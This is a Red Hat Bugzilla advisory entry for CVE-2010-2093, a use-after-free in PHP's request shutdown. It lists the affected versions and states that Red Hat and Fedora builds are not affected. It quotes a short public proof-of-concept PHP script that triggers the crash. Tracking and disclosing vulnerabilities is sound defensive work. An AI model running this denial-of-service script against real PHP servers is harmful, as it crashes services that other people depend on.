Red Hat Bugzilla – Bug 598474
CVE-2010-2093 PHP: Context stream use-after-free on request shutdown (MOPS-2010-022)
Last modified: 2016-03-04 06:40:03 EST
Common Vulnerabilities and Exposures assigned an identifier CVE-2010-2093 to the following vulnerability: Use-after-free vulnerability in the request shutdown functionality in PHP 5.2 before 5.2.13 and 5.3 before 5.3.2 allows context-dependent attackers to cause a denial of service (crash) via a stream context structure that is freed before destruction occurs. References: [1] http://php-security.org/2010/05/12/mops-2010-022-php-stream-context-use-after-free-on-request-shutdown-vulnerability/index.html Public PoC (from [1]): <?php $blah = fopen('/dev/zero','a'); $arr = array(); for ( $i = 0 ; $i < 5000 ; $i++ ) { $arr[$i] = ""; } stream_context_get_options($blah); $a88 = fread($blah,100000000000); ?> Credit: Mateusz Kocielski
This issue is still unfixed in 5.3.3.
Statement: Not Vulnerable. This issue does not affect the version of php as shipped with Red Hat Enterprise Linux 4, 5 and 6. This issue does not affect the version of php53 as shipped with Red Hat Enterprise Linux 5.
Fedora is currently updated to php-5.3 which is not affected by this flaw.